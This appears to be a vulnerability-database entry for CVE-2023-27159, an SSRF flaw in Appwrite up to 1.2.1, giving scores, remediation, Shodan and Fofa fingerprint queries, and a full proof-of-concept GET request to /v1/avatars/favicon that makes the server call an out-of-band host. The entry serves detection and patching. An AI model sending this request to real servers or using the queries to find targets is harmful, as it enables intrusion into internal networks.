🔙 목록으로 돌아가기

CVE-2023-27159: Appwrite <=1.2.1 - Server-Side Request Forgery

TitleAppwrite <=1.2.1 - Server-Side Request Forgery
AuthorDhiyaneshDk
SeverityHigh
ImpactThis vulnerability can lead to unauthorized access to internal resources, potential data leakage, and further exploitation of the server.
RemediationUpgrade Appwrite to a version higher than 1.2.1 to mitigate the SSRF vulnerability.
CVSS Score7.5
EPSS Score0.84688
CVE IDCVE-2023-27159
CWE IDCWE-918
Shodan Querytitle:"Sign In - Appwrite"http.title:"sign in - appwrite"http.favicon.hash:-633108100
Fofa Queryicon_hash=-633108100title="sign in - appwrite"
Tags cve2023 cve appwrite ssrf oast vkev vuln

🔍 Vulnerability Description

Appwrite through 1.2.1 is susceptible to server-side request forgery via the component /v1/avatars/favicon. An attacker can potentially access network resources and sensitive information via a crafted GET request, thereby also making it possible to modify data and/or execute unauthorized administrative operations in the context of the affected site.

🌐 HTTP Request

GET /v1/avatars/favicon?url=http://d5jknthle0o2bi6ihiqgtqwqw1y7jkf9k.oast.live HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.5 Safari/605.1.15 AlohaBrowser/7.6.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2023/CVE-2023-27159.yaml

🦈 Packet Capture: ⬇️ Download cve-2023-27159.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A